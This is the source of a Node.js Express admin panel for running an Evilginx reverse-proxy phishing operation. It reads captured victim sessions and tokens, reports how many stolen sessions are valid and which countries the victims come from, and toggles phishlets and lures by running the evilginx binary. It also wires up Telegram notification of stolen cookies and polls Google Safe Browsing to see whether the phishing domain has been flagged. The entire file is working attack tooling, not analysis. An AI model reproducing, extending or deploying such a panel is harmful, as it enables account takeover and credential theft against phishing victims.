if (process.env.NODE_ENV !== "production") {
  require("dotenv").config();
}
const express = require("express");
const fetch = require("node-fetch");
const path = require("path");
const fs = require("fs");
const passport = require("passport");
const bcrypt = require("bcrypt");
const flash = require("express-flash");
const session = require("express-session");
const morgan = require("morgan");
const chalk = require("chalk");
const { execSync } = require("child_process");
const app = express();
let users = [];
const USERS_FILE = path.join(__dirname, "users.json");
if (fs.existsSync(USERS_FILE)) {
  users = JSON.parse(fs.readFileSync(USERS_FILE, "utf8"));
}
const DB_PATH = path.join(__dirname, "data.db");
const os = require("os");
const EVILGINX_DB = getEvilginxDBPath();
console.log("✅ Evilginx DB Path: " + EVILGINX_DB);
const SETTINGS_FILE = path.join(__dirname, "settings.json");
app.set("views", path.join(__dirname, "views"));
app.set("view-engine", "ejs");
app.use(express.static(path.join(__dirname, "public")));
app.use(morgan("dev"));
app.use(express.urlencoded({ extended: false }));
app.use(express.json());
app.use(session({
  secret: process.env.SESSION_SECRET || "dev-secret-change-me",
  resave: false,
  saveUninitialized: false,
  cookie: { secure: false }
}));
app.use(flash());
app.use(passport.initialize());
app.use(passport.session());
const SAFE_STATUS_FILE = path.join(__dirname, "safe_status.json");
let safeStatusCache = {};
let evilginxProc = null;
let settings = {
  TELEGRAM_BOT_TOKEN: process.env.TELEGRAM_BOT_TOKEN,
  TELEGRAM_CHAT_ID: process.env.TELEGRAM_CHAT_ID
};
if (fs.existsSync(SETTINGS_FILE)) {
  try {
    const data = fs.readFileSync(SETTINGS_FILE, "utf-8");
    settings = JSON.parse(data);
  } catch (err) {
    logMessage("error", "❌ Failed to load settings.json");
  }
}

app.post("/settings/save", checkAuthenticated, (req, res) => {
  const { botToken, chatId } = req.body;
  if (!botToken || !chatId) {
    return res.status(400).json({ message: "❌ Missing bot token or chat ID" });
  }
  settings.TELEGRAM_BOT_TOKEN = botToken;
  settings.TELEGRAM_CHAT_ID = chatId;
  try {
    fs.writeFileSync(SETTINGS_FILE, JSON.stringify(settings, null, 2));
    logMessage("success", "✅ Telegram settings updated.");
    res.json({ message: "✅ Telegram settings saved." });
  } catch (err) {
    logMessage("error", "❌ Failed to save settings: " + err);
    res.status(500).json({ message: "❌ Failed to save settings." });
  }
});

app.post("/settings/change-password", checkAuthenticated, async (req, res) => {
  const { oldPassword, newPassword } = req.body;
  const userIndex = users.findIndex(user => user.name === req.user.name);
  if (userIndex === -1) {
    return res.status(404).json({ message: "❌ User not found" });
  }
  const user = users[userIndex];
  try {
    const passwordMatch = oldPassword === user.password;
    if (!passwordMatch) {
      return res.status(403).json({ message: "❌ Incorrect old password" });
    }
    users[userIndex].password = newPassword;
    fs.writeFileSync(USERS_FILE, JSON.stringify(users, null, 2));
    logMessage("success", "✅ Password changed.");
    res.json({ message: "✅ Password updated." });
  } catch (err) {
    logMessage("error", "❌ Error updating password: " + err);
    res.status(500).json({ message: "❌ Failed to update password" });
  }
});

const initializePassport = require("./passport-config");
initializePassport(
  passport,
  username => users.find(user => user.name === username),
  id => users.find(user => user.id === id)
);

function getEvilginxDBPath() {
  const platform = os.platform();
  if (platform === "win32") {
    return path.join("C:\\Users\\unkn0wn\\", ".xverginia", "data.db");
  } else if (platform === "linux") {
    return path.join("/root/", ".xverginia", "data.db");
  } else {
    console.error("❌ Unsupported OS detected.");
    process.exit(1);
  }
}

function logMessage(type, message) {
  const time = new Date().toLocaleTimeString();
  const prefixes = {
    info: chalk.blue("[INFO] " + time),
    success: chalk.green("[SUCCESS] " + time),
    error: chalk.red("[ERROR] " + time),
    warn: chalk.yellow("[WARNING] " + time)
  };
  console.log(prefixes[type] || prefixes.info, message);
}

function updateDatabaseLink() {
  try {
    if (fs.existsSync(DB_PATH)) {
      fs.unlinkSync(DB_PATH);
      logMessage("warn", "Deleted old database file.");
    }
    fs.symlinkSync(EVILGINX_DB, DB_PATH);
    logMessage("success", "Database relinked successfully.");
  } catch (err) {
    logMessage("error", "Database linking failed: " + err);
  }
}

function readDatabase() {
  try {
    const dbContent = fs.readFileSync(DB_PATH, "UTF-8");
    const lines = dbContent.split("\n");
    const sessions = {};
    lines.forEach(line => {
      if (line.includes("{") || line.includes("\"custom\":{")) {
        try {
          let session = JSON.parse(line);
          if (session.id) {
            sessions[session.id] = session;
          }
        } catch (err) {
          logMessage("error", "Failed to parse session data: " + err);
        }
      }
    });
    return Object.values(sessions);
  } catch (err) {
    logMessage("error", "Error reading database: " + err);
    return [];
  }
}

updateDatabaseLink();

app.get("/", checkAuthenticated, async (req, res) => {
  updateDatabaseLink();
  const sessions = readDatabase();
  logMessage("info", "Welcome back " + req.user.name + "!");
  const oneWeekAgo = Math.floor(Date.now() / 1000) - 604800;
  const recentSessions = sessions.filter(session => session.create_time >= oneWeekAgo);
  const pastSessions = sessions.filter(session => session.create_time < oneWeekAgo);
  const uniqueCountries = new Set();
  recentSessions.forEach(session => {
    if (session.country) {
      uniqueCountries.add(session.country);
    }
  });
  const countryCount = uniqueCountries.size;
  res.render("index.ejs", {
    data: recentSessions,
    pastData: pastSessions,
    countryCount: countryCount
  });
});

app.get("/stats", checkAuthenticated, (req, res) => {
  updateDatabaseLink();
  const sessions = readDatabase();
  const oneWeekAgo = Math.floor(Date.now() / 1000) - 604800;
  const recentSessions = sessions.filter(session => session.create_time >= oneWeekAgo);
  const pastSessions = sessions.filter(session => session.create_time < oneWeekAgo);
  const validSessions = recentSessions.filter(session => Object.keys(session.tokens).length > 0).length;
  const invalidSessions = recentSessions.length - validSessions;
  const validPercent = recentSessions.length > 0 ? Math.round(validSessions / recentSessions.length * 100) : 0;
  const invalidPercent = 100 - validPercent;
  const visitPercent = pastSessions.length > 0 ? Math.round(recentSessions.length / pastSessions.length * 100) : 100;
  const validPast = pastSessions.filter(session => Object.keys(session.tokens).length > 0).length;
  const validPastPercent = pastSessions.length > 0 ? Math.round(validPast / pastSessions.length * 100) : 0;
  const validTrend = validPercent >= validPastPercent ? "bull" : "bear";
  const visitTrend = recentSessions.length >= pastSessions.length ? "bull" : "bear";
  const invalidTrend = invalidPercent >= 100 - validPastPercent ? "bull" : "bear";
  const countrySet = new Set();
  recentSessions.forEach(session => {
    if (session.country) {
      countrySet.add(session.country);
    }
  });
  const countryCount = countrySet.size;
  res.json({
    total: recentSessions.length,
    validCount: validSessions,
    invalidCount: invalidSessions,
    validPercent: validPercent,
    invalidPercent: invalidPercent,
    visitPercent: visitPercent,
    validTrend: validTrend,
    visitTrend: visitTrend,
    invalidTrend: invalidTrend,
    countryCount: countryCount
  });
});

app.get("/login", checkNotAuthenticated, (req, res) => {
  res.render("login.ejs");
});

app.post("/login", checkNotAuthenticated, passport.authenticate("local", {
  successRedirect: "/",
  failureRedirect: "/login",
  failureFlash: true
}), (req, res) => {
  updateDatabaseLink();
  logMessage("success", "User " + req.user.name + " logged in.");
});

app.post("/logout", checkAuthenticated, (req, res) => {
  req.logout(err => {
    if (err) {
      logMessage("error", "Logout failed: " + err);
      return res.redirect("/");
    }
    req.session.destroy(() => {
      res.clearCookie("connect.sid");
      logMessage("success", "User logged out successfully.");
      res.redirect("/login");
    });
  });
});

app.post("/delete-all", checkAuthenticated, (req, res) => {
  try {
    fs.writeFileSync(DB_PATH, "");
    logMessage("success", "All sessions deleted.");
    res.json({ message: "✅ All sessions deleted." });
  } catch (err) {
    logMessage("error", "Failed to delete all sessions: " + err);
    res.status(500).json({ message: "❌ Failed to delete sessions." });
  }
});

app.get("/get-telegram", checkAuthenticated, (req, res) => {
  return res.json({
    chatId: process.env.TELEGRAM_CHAT_ID || "",
    botToken: process.env.TELEGRAM_BOT_TOKEN || ""
  });
});

app.get("/sessions/table", checkAuthenticated, (req, res) => {
  updateDatabaseLink();
  const sessions = readDatabase();
  res.render("partials/table.ejs", { data: sessions });
});

app.get("/api/sessions-json", checkAuthenticated, (req, res) => {
  updateDatabaseLink();
  const sessions = readDatabase();
  res.json(sessions);
});

app.post("/verify-login", (req, res) => {
  const { name, password } = req.body;
  const user = users.find(user => user.name === name);
  if (!user) {
    return res.json({ success: false, message: "❌ Invalid username or password" });
  }
  const passwordMatch = password === user.password;
  if (passwordMatch) {
    return res.json({ success: true, message: "✅ Valid credentials" });
  } else {
    return res.json({ success: false, message: "❌ Invalid username or password" });
  }
});

app.post("/notify", async (req, res) => {
  const botToken = process.env.TELEGRAM_BOT_TOKEN;
  const chatId = process.env.TELEGRAM_CHAT_ID;
  const message = req.body?.message || "Default *Telegram* message from backend!";
  const mockSession = { tokens: "mocked_token_data", id: "user123" };
  try {
    await fetch("https://api.telegram.org/bot" + botToken + "/sendMessage", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        chat_id: chatId,
        text: message,
        parse_mode: "Markdown"
      })
    });
    sendCookiesToTelegram(mockSession.tokens, mockSession.id);
    res.send("✅ Notification sent!");
  } catch (err) {
    console.error("Telegram Error:", err);
    res.status(500).send("❌ Error sending notification.");
  }
});

function sendCookiesToTelegram(cookies, userId) {
  console.log("Sending cookies for user " + userId + ": " + cookies);
}

function checkAuthenticated(req, res, next) {
  if (req.isAuthenticated()) {
    return next();
  }
  if (req.headers.accept?.includes("application/json")) {
    return res.status(401).json({ message: "Unauthorized" });
  }
  logMessage("warn", "Unauthorized access attempt.");
  res.redirect("/login");
}

function checkNotAuthenticated(req, res, next) {
  if (req.isAuthenticated()) {
    return res.redirect("/");
  }
  next();
}

app.get("/api/phishlets", checkAuthenticated, async (req, res) => {
  res.setHeader("Cache-Control", "no-store");
  try {
    const platform = os.platform();
    const command = platform === "win32" 
      ? "C:\\Users\\unkn0wn\\evilginx2\\build\\evilginx.exe -p C:\\Users\\unkn0wn\\evilginx2\\phishlets" 
      : "./evilginx -p ./phishlets";
    const output = execSync(command).toString();
    const lines = output.split("\n");
    const phishlets = [];
    let inTable = false;
    for (const line of lines) {
      const trimmedLine = line.trim();
      if (trimmedLine.startsWith("| phishlet")) {
        inTable = true;
        continue;
      }
      if (inTable && trimmedLine.startsWith("|") && trimmedLine.includes("|")) {
        const columns = trimmedLine.split("|").map(col => col.trim());
        const name = columns[1];
        const status = columns[2];
        if (name && status && name !== "phishlet") {
          phishlets.push({
            name: name,
            status: status.toLowerCase() === "enabled" ? "active" : "disabled",
            description: "🍪 Cookies Page"
          });
        }
      }
    }
    res.status(200).json(phishlets);
  } catch (err) {
    logMessage("error", "Failed to get phishlets: " + err);
    res.status(500).json({ message: "Failed to get phishlets." });
  }
});

app.post("/api/phishlets/enable", checkAuthenticated, async (req, res) => {
  const { name } = req.body;
  if (!name) {
    return res.status(400).json({ message: "❌ Missing phishlet name." });
  }
  try {
    const configPath = os.platform() === "win32" 
      ? "C:\\Users\\unkn0wn\\.xverginia\\config.json" 
      : "/root/.xverginia/config.json";
    const configData = fs.readFileSync(configPath, "utf8");
    const config = JSON.parse(configData);
    if (!config.phishlets[name]) {
      return res.status(404).json({ message: "❌ Phishlet '" + name + "' not found." });
    }
    config.phishlets[name].enabled = true;
    fs.writeFileSync(configPath, JSON.stringify(config, null, 2));
    res.json({ message: "✅ Phishlet '" + name + "' enabled." });
  } catch (err) {
    logMessage("error", "Failed to enable phishlet '" + name + "': " + err);
    res.status(500).json({ message: "❌ Failed to enable phishlet." });
  }
});

app.post("/api/phishlets/disable", checkAuthenticated, async (req, res) => {
  const { name } = req.body;
  if (!name) {
    return res.status(400).json({ message: "❌ Missing phishlet name." });
  }
  try {
    const configPath = os.platform() === "win32" 
      ? "C:\\Users\\unkn0wn\\.xverginia\\config.json" 
      : "/root/.xverginia/config.json";
    const configData = fs.readFileSync(configPath, "utf8");
    const config = JSON.parse(configData);
    if (!config.phishlets[name]) {
      return res.status(404).json({ message: "❌ Phishlet '" + name + "' not found." });
    }
    config.phishlets[name].enabled = false;
    fs.writeFileSync(configPath, JSON.stringify(config, null, 2));
    res.json({ message: "✅ Phishlet '" + name + "' disabled." });
  } catch (err) {
    logMessage("error", "Failed to disable phishlet '" + name + "': " + err);
    res.status(500).json({ message: "❌ Failed to disable phishlet." });
  }
});

app.get("/api/config", checkAuthenticated, (req, res) => {
  const configPath = os.platform() === "win32" 
    ? "C:\\Users\\unkn0wn\\.xverginia\\config.json" 
    : "/root/.xverginia/config.json";
  const config = JSON.parse(fs.readFileSync(configPath, "utf8"));
  res.json(config);
});

app.post("/api/config/update", checkAuthenticated, (req, res) => {
  const configPath = os.platform() === "win32" 
    ? "C:\\Users\\unkn0wn\\.xverginia\\config.json" 
    : "/root/.xverginia/config.json";
  const config = JSON.parse(fs.readFileSync(configPath, "utf8"));
  if (req.body.general) {
    config.general = { ...config.general, ...req.body.general };
  }
  if (req.body.blacklist) {
    config.blacklist = { ...config.blacklist, ...req.body.blacklist };
  }
  if (req.body.lures) {
    config.lures = req.body.lures;
  }
  if (req.body.phishlets) {
    config.phishlets = req.body.phishlets;
  }
  fs.writeFileSync(configPath, JSON.stringify(config, null, 2));
  res.json({ message: "✅ Configuration saved successfully." });
});

if (fs.existsSync(SAFE_STATUS_FILE)) {
  safeStatusCache = JSON.parse(fs.readFileSync(SAFE_STATUS_FILE, "utf8"));
}

app.get("/api/safety-status", checkAuthenticated, (req, res) => {
  const configPath = os.platform() === "win32" 
    ? "C:\\Users\\unkn0wn\\.xverginia\\config.json" 
    : "/root/.xverginia/config.json";
  const domain = JSON.parse(fs.readFileSync(configPath, "utf8")).general.domain;
  const status = safeStatusCache[domain] || { unsafe: false, last_checked: null };
  res.json(status);
});

async function checkSafeBrowsing() {
  const configPath = os.platform() === "win32" 
    ? "C:\\Users\\unkn0wn\\.xverginia\\config.json" 
    : "/root/.xverginia/config.json";
  const config = JSON.parse(fs.readFileSync(configPath, "utf8"));
  const domain = config.general.domain;
  const now = new Date();
  const lastChecked = safeStatusCache[domain]?.last_checked 
    ? new Date(safeStatusCache[domain].last_checked) 
    : new Date(0);
  const hoursSinceCheck = (now - lastChecked) / 1000 / 3600;
  if (hoursSinceCheck < 12) {
    return;
  }
  const url = "https://" + domain;
  const requestBody = {
    client: {
      clientId: "evilginx",
      clientVersion: "1.0"
    },
    threatInfo: {
      threatTypes: ["MALWARE", "SOCIAL_ENGINEERING", "UNWANTED_SOFTWARE", "POTENTIALLY_HARMFUL_APPLICATION"],
      platformTypes: ["ANY_PLATFORM"],
      threatEntryTypes: ["URL"],
      threatEntries: [{ url: url }]
    }
  };
  try {
    const response = await fetch(
      "https://safebrowsing.googleapis.com/v4/threatMatches:find?key=" + process.env.SAFE_BROWSING_API_KEY,
      {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(requestBody)
      }
    );
    const result = await response.json();
    safeStatusCache[domain] = {
      unsafe: !!result.matches,
      last_checked: now.toISOString()
    };
    fs.writeFileSync(SAFE_STATUS_FILE, JSON.stringify(safeStatusCache, null, 2));
    logMessage("info", "Safe Browsing check complete for " + domain + ": " + (result.matches ? "UNSAFE" : "Safe"));
  } catch (err) {
    logMessage("error", "Safe Browsing check failed: " + err);
  }
}

setInterval(checkSafeBrowsing, 3600000);
checkSafeBrowsing();
logMessage("success", "🚀 Server Running");
app.listen(2030);